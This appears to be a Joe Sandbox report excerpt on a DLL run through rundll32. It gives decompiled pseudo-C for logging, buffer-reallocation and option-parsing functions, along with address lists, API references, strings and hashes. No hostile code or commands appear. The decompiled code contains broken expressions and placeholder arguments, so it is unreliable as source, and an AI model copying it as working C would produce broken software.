										 *(_t141 - 2) = _t148;
									}
									if(_t99 >= 4) {
										_t168[7] = _t99;
										_t131 = 0;
										_t151 = _t99 & 0xfffffffc;
										do {
											 *(_t141 + _t131) = _t161[_t131];
											_t131 = _t131 + 4;
										} while (_t131 < _t151);
										_t99 = _t168[7];
										_t141 = _t141 + _t131;
										_t161 =  &(_t161[_t131]);
									}
								}
								_t130 = 0;
								if((_t99 & 0x00000002) != 0) {
									_t130 = 2;
									 *_t141 =  *_t161 & 0x0000ffff;
								}
								if((_t99 & 0x00000001) != 0) {
									 *((char*)(_t141 + _t130)) = _t161[_t130] & 0x000000ff;
								}
								_t142 = _t167[1];
								_t102 =  >  ? _t119 : 0xfffffffa - _t142;
								_t86 = ( >  ? _t119 : 0xfffffffa - _t142) + _t142;
								_t136 = _t167[2];
								_t167[1] = 0xfffffffa;
								if(_t136 != 0) {
									L39:
									_t138 =  >  ? _t86 : _t136 - 1;
									_t93 =  *_t167;
									 *((char*)(_t93 + ( >  ? _t86 : _t136 - 1))) = 0;
									return _t93;
								}
								goto L40;
							} else {
								_t162 =  &(_t168[8]);
								 *_t168 = _t162;
								_t168[3] = _t168[0x112];
								_t168[2] = _t168[0x111];
								_t86 = 0x400;
								_t168[1] = 0x400;
								L1009DCA8();
								if(0x400 != 0) {
									_t168[2] = _t162;
									_t168[1] = 0x100ac500;
									 *_t168 = _t167;
									return L100089C0();
								} else {
									if(_t119 != 0) {
										_t145 = _t167[1];
										goto L26;
									}
									goto L40;
								}
							}
						} else {
							_t110 =  >  ? _t159 : 0xfffffffe - _t145;
							_t111 = _t145 + ( >  ? _t159 : 0xfffffffe - _t145) + 1;
							if(_t124 >> 1 >= _t118) {
								_t118 = _t118 + _t118;
							} else {
								_t118 = _t124;
							}
							if(_t118 < _t111) {
								_t115 =  <=  ? _t124 : _t111;
								_t118 =  <=  ? _t124 : _t111;
							}
							_t165 =  *_t167;
							_t168[1] = _t118;
							if(_t165 ==  &(_t167[4])) {
								 *_t168 = 0;
								_t113 = E10026280();
								if(_t113 == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								 *_t168 = _t165;
								_t113 = E10026280();
								if(_t113 == 0) {
									L21:
									_t118 = _t167[2];
									_t145 = _t167[1];
									goto L22;
								} else {
									if(_t165 == 0) {
										L19:
										_t153 = _t167[1];
										_t143 = _t113;
										_t166 =  *_t167;
										_t132 = _t153 + 1;
										_t168[7] = _t166;
										if(_t132 >= 8) {
											if((_t113 & 0x00000001) != 0) {
												_t144 =  *_t166 & 0x000000ff;
												_t132 = _t153;
												_t166 = _t166 + 1;
												 *_t113 = _t144;
												_t82 = _t113 + 1; // 0x1
												_t143 = _t82;
											}
											if((_t143 & 0x00000002) != 0) {
												_t154 =  *_t166 & 0x0000ffff;
												_t143 = _t143 + 2;
												_t166 = _t166 + 2;
												_t132 = _t132 - 2;
												 *(_t143 - 2) = _t154;
											}
											if((_t143 & 0x00000004) != 0) {
												_t158 =  *_t166;
												_t143 = _t143 + 4;
												_t166 = _t166 + 4;
												_t132 = _t132 - 4;
												 *(_t143 - 4) = _t158;
											}
										}
										_t114 = memcpy(_t143, _t166, _t132);
										_t168 =  &(_t168[3]);
									}
									 *_t167 = _t114;
									_t167[2] = _t118;
									continue;
								}
							}
						}
						goto L66;
						L15:
						_t168[1] = _t121;
						_t168[7] = _t121;
						_t168[3] = _t168[0x112];
						_t168[2] = _t168[0x111];
						_t91 =  *_t167;
						 *_t168 = _t91 + _t145;
						L1009DCA8();
						if(_t91 != 0) {
							_t122 = _t167[1];
							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
							_t136 = _t167[2];
							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
							_t167[1] = _t86;
							if(_t136 != 0) {
								goto L39;
							}
							goto L40;
						} else {
							_t123 = _t168[7];
							_t159 = 0x7fffffff;
							_t145 = _t167[1];
							_t118 = _t167[2];
							if(_t123 <= 0x3fffffff) {
								_t159 = _t123 + _t123;
							}
							goto L11;
						}
						goto L66;
					}
				}
				L66:
			}

0x1000913a
0x10009141
0x1000914b
0x10009377
0x10009377
0x10009151
0x10009151
0x1000919d
0x1000919d
0x100091a6
0x100091a9
0x100091ab
0x00000000
0x00000000
0x100091b4
0x100091bc
0x100091bc
0x100091bf
0x100091bf
0x100091c4
0x10009287
0x1000928b
0x1000928e
0x10009296
0x100092d6
0x100092d9
0x100092db
0x100092e0
0x100093f6
0x100094c6
0x100094c9
0x100094cc
0x100094cc
0x10009402
0x100094b6
0x100094bb
0x100094be
0x100094be
0x1000940e
0x100094a5
0x100094ab
0x100094ae
0x100094ae
0x10009414
0x10009416
0x10009419
0x10009421
0x10009421
0x10009421
0x10009426
0x00000000
0x1000942c
0x00000000
0x1000942c
0x00000000
0x100092e6
0x100092e9
0x100092eb
0x100092eb
0x100092f1
0x100092f1
0x100092e9
0x100092f4
0x100092f7
0x100092f9
0x100092fe
0x100092fe
0x10009304
0x10009306
0x10009306
0x10009311
0x1000931b
0x1000931e
0x10009323
0x100093b3
0x100094ee
0x100094ef
0x100094f4
0x100094f5
0x100094f5
0x100093bc
0x100094d2
0x100094d5
0x100094d8
0x100094db
0x100094de
0x100094de
0x100093c5
0x100093cb
0x100093d1
0x100093d3
0x100093d6
0x100093d9
0x100093dc
0x100093df
0x100093e3
0x100093e7
0x100093e9
0x100093e9
0x100093c5
0x10009329
0x1000932d
0x10009332
0x10009337
0x10009337
0x1000933c
0x10009342
0x10009342
0x10009345
0x10009351
0x10009354
0x10009356
0x10009359
0x1000935e
0x10009360
0x10009363
0x10009366
0x10009369
0x00000000
0x10009369
0x00000000
0x10009298
0x1000929f
0x100092a3
0x100092a6
0x100092b1
0x100092b5
0x100092ba
0x100092be
0x100092c5
0x10009460
0x10009469
0x1000946d
0x1000947f
0x100092cb
0x100092cd
0x100092d3
0x00000000
0x100092d3
0x00000000
0x100092cd
0x100092c5
0x100091d2
0x100091db
0x100091e2
0x100091e8
0x10009160
0x100091ee
0x100091ee
0x100091ee
0x10009164
0x10009168
0x1000916b
0x1000916b
0x1000916d
0x10009173
0x10009179
0x10009250
0x10009257
0x1000925e
0x00000000
0x00000000
0x00000000
0x00000000
0x1000917f
0x1000917f
0x10009182
0x10009189
0x10009281
0x10009281
0x10009284
0x00000000
0x1000918f
0x10009191
0x10009260
0x10009260
0x10009263
0x10009265
0x10009268
0x1000926b
0x10009272
0x10009382
0x10009495
0x10009498
0x1000949a
0x1000949b
0x1000949d
0x1000949d
0x1000949d
0x1000938b
0x10009480
0x10009483
0x10009486
0x10009489
0x1000948c
0x1000948c
0x10009394
0x1000939a
0x1000939c
0x1000939f
0x100093a2
0x100093a5
0x100093a5
0x10009394
0x1000927a
0x1000927a
0x1000927a
0x10009197
0x1000919a
0x00000000
0x1000919a
0x10009189
0x10009179
0x00000000
0x100091f8
0x100091f8
0x10009203
0x10009207
0x10009212
0x10009216
0x1000921b
0x1000921e
0x10009225
0x10009438
0x10009444
0x10009447
0x1000944a
0x1000944c
0x10009451
0x00000000
0x10009457
0x00000000
0x1000922b
0x1000922b
0x1000922f
0x10009234
0x10009237
0x10009240
0x10009246
0x10009246
0x00000000
0x10009240
0x00000000
0x10009225
0x1000919d
0x00000000

APIs

mv_realloc.MAIN ref: 10009182
strlen.MSVCRT ref: 100091B7
strftime.MSVCRT ref: 1000921E

Strings

!!!!, xrefs: 1000941C
[truncated strftime output], xrefs: 10009311

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_reallocstrftimestrlen
String ID: !!!!$[truncated strftime output]
API String ID: 709960874-1743851734
Opcode ID: f29f42bb8ffea11f48ea5e99c1610936806f5c95083409d1b8b746ef61fd5416
Instruction ID: 5e96dacd8902ef441cde7e6f7e331d45904ef3b1d824b749351cd4a48aad1636
Opcode Fuzzy Hash: f29f42bb8ffea11f48ea5e99c1610936806f5c95083409d1b8b746ef61fd5416
Instruction Fuzzy Hash: FFA1BFB1A042429FE710CF28C98579E77E2EF843D0F268529ED898B399E735DD45CB41

Uniqueness

Uniqueness Score: -1.00%

Function 1002C736 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128stringCOMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.MAIN ref: 1002C5F5
strcmp.MSVCRT ref: 1002C6CE
mv_log.MAIN ref: 1002C99D

Strings

9, xrefs: 1002C740
all, xrefs: 1002C56F
max, xrefs: 1002C505
default, xrefs: 1002C4D2
none, xrefs: 1002C54A
min, xrefs: 1002C51F

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_parse_and_evalmv_logstrcmp
String ID: 9$all$default$max$min$none
API String ID: 638344568-340763830
Opcode ID: cbd95094e55aa019dd321054222498a877d501c9dab8c4b56b7ccccdadb64703
Instruction ID: 411126b03e5c4c9fee0fee3cc8844fcbddd9a5d1040519b46a4fb5c1d41167ed
Opcode Fuzzy Hash: cbd95094e55aa019dd321054222498a877d501c9dab8c4b56b7ccccdadb64703
Instruction Fuzzy Hash: EC514A7590974A8BC351EF68E04469BF7E5FF89344F518A2EE9C9D7200EB70E9048B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.MAIN ref: 1000C308
mv_bprintf.MAIN ref: 1000C330

Strings

NONE, xrefs: 1000C327
USR%d, xrefs: 1000C37C
AMBI%d, xrefs: 1000C394

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 2490314137-3656852315
Opcode ID: 18c3f00c932525b9a03c6c26bd996f108cdefc78bc7c7bb15c7cae72aa0d9e7e
Instruction ID: 1ef98ca077266c32d1aee9727dfec110bedddac347624ae906d8e5fb6b24c5a3
Opcode Fuzzy Hash: 18c3f00c932525b9a03c6c26bd996f108cdefc78bc7c7bb15c7cae72aa0d9e7e
Instruction Fuzzy Hash: 20114FB4918B55CBE714EF28C480A5EB7E0FF88780F51C92EF68897254D334AE419B97

Uniqueness

Uniqueness Score: -1.00%

Function 1000C470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.MAIN ref: 1000C4A8
mv_bprintf.MAIN ref: 1000C4D0

Strings

ambisonic ACN %d, xrefs: 1000C534
none, xrefs: 1000C4C7
user %d, xrefs: 1000C51C

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 2490314137-4180635230
Opcode ID: 6d247fa50da3d5541497e9d82b9e4f8f3eef7e7a432eeee65763f77ec15faa69
Instruction ID: c94b059796d13185444bee4ca381abcd6d61be9244a4282c7920a982e5d4d1e4
Opcode Fuzzy Hash: 6d247fa50da3d5541497e9d82b9e4f8f3eef7e7a432eeee65763f77ec15faa69
Instruction Fuzzy Hash: 51112EB4908B55CBE320DF24D480A6EB7E0FF847C4F51882EF59887289D734A941DB97

Uniqueness

Uniqueness Score: -1.00%

Function 10023249 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 173
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E10023249(void* __eax, signed char* __ebp, char* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, unsigned int _a36, intOrPtr _a40, intOrPtr _a44, char _a48, signed char* _a1072, signed char* _a2096, signed char* _a3120, signed char* _a4144, intOrPtr _a4148, intOrPtr _a4152, signed int _a5204, char* _a5208, char* _a5212) {
				signed int _t67;
				signed int _t71;
				signed int _t74;
				signed int _t77;
				signed int _t80;
				signed int _t85;
				void* _t88;
				signed char* _t89;
				int _t91;
				signed char* _t92;
				char* _t97;
				intOrPtr _t100;
				signed char* _t101;
				char* _t111;
				signed char* _t112;
				signed char* _t113;
				signed char* _t114;
				signed char* _t115;
				char* _t117;
				signed int _t131;
				signed char* _t132;
				char* _t133;
				signed int _t134;
				char* _t136;
				signed char* _t141;
				signed char** _t143;

				_t141 = __ebp;
				_a44 = 0x10;
				_a40 = 0x10;
				if(_a5204 < 0xfffffff9 || __eax == 0 || ( *0x100d568c & 0x00000002) == 0) {
					L3:
					 *_t143 = _t141;
					_a8 = _a5212;
					_a4 = _a5208;
					L10008B70();
					_t117 = _a1072;
					_t111 = _a2096;
					_t133 = _a3120;
					_t136 = _a4144;
					if( *_t117 != 0 ||  *_t111 != 0 ||  *_t133 != 0 ||  *_t136 != 0) {
						_t100 = _a4148;
						_t67 = 0;
						if(_t100 != 0 && _a4152 >= _t100) {
							_t67 = (0 | ( *(_t136 + _t100 - 1) & 0x000000ff) == 0x0000000a |  *(_t136 + _t100 - 1) & 0 | ( *(_t136 + _t100 - 1) & 0x000000ff) == 0x0000000d) & 0x000000ff;
						}
						 *0x100aa00c = _t67;
					}
					_a24 = _t136;
					_t101 =  &_a48;
					_a8 = "%s%s%s%s";
					_a20 = _t133;
					_a16 = _t111;
					_a12 = _t117;
					_a4 = 0x400;
					 *_t143 = _t101;
					L10022FC0();
					_t71 =  *0x100d5680;
					if(_t71 == 0) {
						 *_t143 = 2;
						L1009DD30();
						asm("sbb eax, eax");
						 *0x100d5680 = _t71 | 0x00000001;
					}
					_t134 =  *0x100aa00c; // 0x1
					_t137 =  *0x100d5260;
					if(_t134 == 0 || ( *0x100d568c & 0x00000001) == 0) {
						L14:
						if(_t137 > 0) {
							 *_t143 = 2;
							_t134 = 0;
							_t89 =  *0x100aa0cc();
							_a8 = _t137;
							_t137 = "    Last message repeated %d times\n";
							_a4 = "    Last message repeated %d times\n";
							 *_t143 = _t89;
							L10022AF0();
							 *0x100d5260 = 0;
						}
						_a4 = _t101;
						 *_t143 = 0x100d5280;
						strcpy(??, ??);
						_t112 = _a1072;
						_t74 =  *_t112 & 0x000000ff;
						if(_t74 == 0) {
							L22:
							L10022C90(_a40, _t101, _t112, 0, _t134, _t137);
							_t113 = _a2096;
							_t77 =  *_t113 & 0x000000ff;
							if(_t77 == 0) {
								L28:
								L10022C90(_a44, _t101, _t113, 0, _t134, _t137);
								_t114 = _a3120;
								_t80 =  *_t114 & 0x000000ff;
								if(_t80 == 0) {
									L34:
									_t139 = _a36 >> 8;
									_t104 =  >  ? 7 : _a5204 >> 3;
									_t105 =  <  ? 0 :  >  ? 7 : _a5204 >> 3;
									L10022C90( <  ? 0 :  >  ? 7 : _a5204 >> 3,  <  ? 0 :  >  ? 7 : _a5204 >> 3, _t114, _a36 >> 8, _t134, _a36 >> 8);
									_t115 = _a4144;
									_t85 =  *_t115 & 0x000000ff;
									if(_t85 == 0) {
										L40:
										L10022C90(_t105, _t105, _t115, _t139, _t134, _t139);
										goto L41;
									}
									L36:
									while(_t85 - 0xe > 0x11 && _t85 > 7) {
										_t85 = _t115[1] & 0x000000ff;
										_t115 =  &(_t115[1]);
										if(_t85 != 0) {
											continue;
										}
										L39:
										_t115 = _a4144;
										goto L40;
									}
									 *_t115 = 0x3f;
									_t115 =  &(_t115[1]);
									_t85 =  *_t115 & 0x000000ff;
									if(_t85 != 0) {
										goto L36;
									}
									goto L39;
								}
								L30:
								while(_t80 - 0xe > 0x11 && _t80 > 7) {
									_t80 = _t114[1] & 0x000000ff;
									_t114 =  &(_t114[1]);
									if(_t80 != 0) {
										continue;
									}
									L33:
									_t114 = _a3120;
									goto L34;
								}
								 *_t114 = 0x3f;
								_t114 =  &(_t114[1]);
								_t80 =  *_t114 & 0x000000ff;
								if(_t80 != 0) {
									goto L30;
								}
								goto L33;
							}
							L24:
							while(_t77 - 0xe > 0x11 && _t77 > 7) {
								_t77 = _t113[1] & 0x000000ff;
								_t113 =  &(_t113[1]);
								if(_t77 != 0) {
									continue;
								}
								L27:
								_t113 = _a2096;
								goto L28;
							}
							 *_t113 = 0x3f;
							_t113 =  &(_t113[1]);
							_t77 =  *_t113 & 0x000000ff;
							if(_t77 != 0) {
								goto L24;
							}
							goto L27;
						} else {
							L18:
							while(_t74 - 0xe > 0x11 && _t74 > 7) {
								_t74 = _t112[1] & 0x000000ff;
								_t112 =  &(_t112[1]);
								if(_t74 != 0) {
									continue;
								}
								L21:
								_t112 = _a1072;
								goto L22;
							}
							 *_t112 = 0x3f;
							_t112 =  &(_t112[1]);
							_t74 =  *_t112 & 0x000000ff;
							if(_t74 != 0) {
								goto L18;
							}
							goto L21;
						}
					} else {
						 *_t143 = _t101;
						_t115 = 0x100d5280;
						_a4 = 0x100d5280;
						_t91 = strcmp(??, ??);
						if(_t91 != 0) {
							goto L14;
						}
						if(_a48 != 0) {
							 *_t143 = _t101;
							L1009DCB0();
							if( *((char*)(_t143 + _t91 + 0x2f)) == 0xd) {
								goto L14;
							}
							_t139 =  &(_t137[1]);
							 *0x100d5260 = _t139;
							if( *0x100d5680 == 1) {
								 *_t143 = 2;
								_t92 =  *0x100aa0cc();
								_a8 = _t139;
								_a4 = "    Last message repeated %d times\r";
								 *_t143 = _t92;
								L10022AF0();
							}
							L41:
							 *_t143 = _t141;
							_a4 = 0;
							_t88 = E10009690(0, _t115, _t134, _t139);
							 *_t143 = 0x100d5690;
							L1009DE50();
							return _t88;
						}
						goto L14;
					}
				} else {
					_t54 = _a5204 + 8; // 0x101
					_t131 = _t54;
					_t97 = 0x100b367b;
					if(_t131 <= 0x40) {
						_t97 =  *(0x100b3880 + _t131 * 4);
					}
					_a8 = _t97;
					_a4 = "[%s] ";
					 *_t143 = _t132;
					L100089C0();
					goto L3;
				}
			}

0x10023249
0x1002325a
0x1002325e
0x1002326a
0x10023274
0x10023274
0x1002327e
0x10023289
0x1002328d
0x10023292
0x10023299
0x100232a0
0x100232a7
0x100232b1
0x100234f0
0x100234f7
0x100234fb
0x10023519
0x10023519
0x1002351c
0x1002351c
0x100232e0
0x100232e4
0x100232ed
0x100232f6
0x100232fa
0x100232fe
0x10023302
0x10023306
0x10023309
0x1002330e
0x10023315
0x10023590
0x10023597
0x1002359f
0x100235a4
0x100235a4
0x1002331b
0x10023321
0x10023329
0x10023360
0x10023362
0x10023364
0x1002336b
0x1002336d
0x10023373
0x10023377
0x1002337c
0x10023380
0x10023383
0x10023388
0x10023388
0x1002338e
0x10023392
0x10023399
0x1002339e
0x100233a5
0x100233aa
0x100233d6
0x100233dc
0x100233e1
0x100233e8
0x100233ed
0x10023416
0x1002341c
0x10023421
0x10023428
0x1002342d
0x10023456
0x10023469
0x1002346e
0x10023477
0x1002347c
0x10023481
0x10023488
0x1002348d
0x100234b6
0x100234ba
0x00000000
0x100234ba
0x00000000
0x10023490
0x100234a6
0x100234aa
0x100234ad
0x00000000
0x00000000
0x100234af
0x100234af
0x00000000
0x100234af
0x10023548
0x1002354b
0x1002354c
0x10023551
0x00000000
0x00000000
0x00000000
0x10023557
0x00000000
0x10023430
0x10023446
0x1002344a
0x1002344d
0x00000000
0x00000000
0x1002344f
0x1002344f
0x00000000
0x1002344f
0x10023530
0x10023533
0x10023534
0x10023539
0x00000000
0x00000000
0x00000000
0x1002353f
0x00000000
0x100233f0
0x10023406
0x1002340a
0x1002340d
0x00000000
0x00000000
0x1002340f
0x1002340f
0x00000000
0x1002340f
0x10023560
0x10023563
0x10023564
0x10023569
0x00000000
0x00000000
0x00000000
0x100233b0
0x00000000
0x100233b0
0x100233c6
0x100233ca
0x100233cd
0x00000000
0x00000000
0x100233cf
0x100233cf
0x00000000
0x100233cf
0x10023578
0x1002357b
0x1002357c
0x10023581
0x00000000
0x00000000
0x00000000
0x10023587
0x10023334
0x10023334
0x10023337
0x1002333c
0x10023340
0x10023347
0x00000000
0x00000000
0x1002334e
0x100236a7
0x100236aa
0x100236b4
0x00000000
0x00000000
0x100236ba
0x100236c2
0x100236c8
0x100236ce
0x100236d5
0x100236e0
0x100236e4
0x100236e8
0x100236eb
0x100236eb
0x100234bf
0x100234bf
0x100234c4
0x100234c8
0x100234cd
0x100234d4
0x100234e6
0x100234e6
0x00000000
0x1002334e
0x1002365d
0x10023664
0x10023664
0x10023667
0x1002366f
0x1002369e
0x1002369e
0x10023671
0x1002367a
0x1002367e
0x10023681
0x00000000
0x10023681

APIs

mv_vbprintf.MAIN ref: 1002328D
strcmp.MSVCRT ref: 10023340
strcpy.MSVCRT ref: 10023399
mv_bprint_finalize.MAIN ref: 100234C8
ReleaseSRWLockExclusive.KERNEL32 ref: 100234D4
mv_bprintf.MAIN ref: 10023681

Strings

Last message repeated %d times, xrefs: 10023377
%s%s%s%s, xrefs: 100232E8

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ExclusiveLockReleasemv_bprint_finalizemv_bprintfmv_vbprintfstrcmpstrcpy
String ID: Last message repeated %d times$%s%s%s%s
API String ID: 4275616186-2673086376
Opcode ID: 42d1c28a59b315c23aa48637e9ae167f894d38651270de1a8a98ee9fcc4ad737
Instruction ID: b81f238ef4300ec1d8f16b3a8da4b914aea516d51c501e69078f494d4313df77
Opcode Fuzzy Hash: 42d1c28a59b315c23aa48637e9ae167f894d38651270de1a8a98ee9fcc4ad737
Instruction Fuzzy Hash: E561E4709087958FD720DF24D4803AABBE2FF85384F95885EE8C957342C776E985CB82

Uniqueness

Uniqueness Score: -1.00%

Function 10028070 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 92stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 10028099
strtol.MSVCRT ref: 10028143
mv_log.MAIN ref: 1002817E

Strings

Value %d for parameter '%s' out of %s format range [%d - %d], xrefs: 100281B3
Unable to parse option value "%s" as %s, xrefs: 10028165
none, xrefs: 1002808E

Memory Dump Source

Source File: 00000004.00000002.374628695.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.374621142.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374763418.00000000100AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374768576.00000000100AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374795926.00000000101D8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374804768.00000000101DD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101DE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374809846.00000000101E1000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.374833147.00000000101FC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: mv_logstrcmpstrtol
String ID: Unable to parse option value "%s" as %s$Value %d for parameter '%s' out of %s format range [%d - %d]$none
API String ID: 3237617949-2908652078
Opcode ID: 691e268f59eefe45aab27bd49c65c0bfe69c5a44b4361b2dd8b56a23eaf8e8d9
Instruction ID: 4bc733314f34f2699ba82556ed72ea64bb9030a0ec2445b5dd4e85adb85467a1
Opcode Fuzzy Hash: 691e268f59eefe45aab27bd49c65c0bfe69c5a44b4361b2dd8b56a23eaf8e8d9
Instruction Fuzzy Hash: AB3137B4A097458FC344DF78948010AFBE1EFC9390F908A2EF9A9D7391E770D9458B42

Uniqueness

Uniqueness Score: -1.00%

Function 1002D660 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E1002D660(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v76;
				intOrPtr _v80;
				char* _v84;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr _t37;
				char* _t41;
				intOrPtr* _t45;
				intOrPtr _t52;
				char* _t53;
				intOrPtr* _t54;
				void* _t55;
				intOrPtr* _t56;
				void* _t64;

				_t56 = _t55 - 0x4c;
				_t45 = _a8;
				_v32 = 0;
				_t53 = _a4;
				_t52 = _a12;
				if(_t45 == 0) {
					L10:
					return 0;
				} else {
					_t54 = 0;
					while(1) {
						_v84 = _t54;
						_v80 = 2;
						_v88 = 0x100b3f1d;
						 *_t56 =  *_t45;
						_t33 = E100110D0();
						_t54 = _t33;
						if(_t33 == 0) {
							break;
						}
						_v80 = _t52;
						_v84 = _a4;
						 *_t56 = _t53;
						_v88 =  *_t54;
						_t37 = L1002CB80(_t45, _t52, _t53, _t54, _t64);
						if(_t37 == 0xabafb008) {
							_v80 = 0;
							_v84 = _a4;
							_v88 =  *_t54;
							_t41 =  &_v32;
							 *_t56 = _t41;
							_v52 = _t41;
							_t37 = E10011210(_t45, _t52, _t53, _t54);
							if(_t37 >= 0) {
								continue;
							} else {
								goto L6;
							}
						} else {
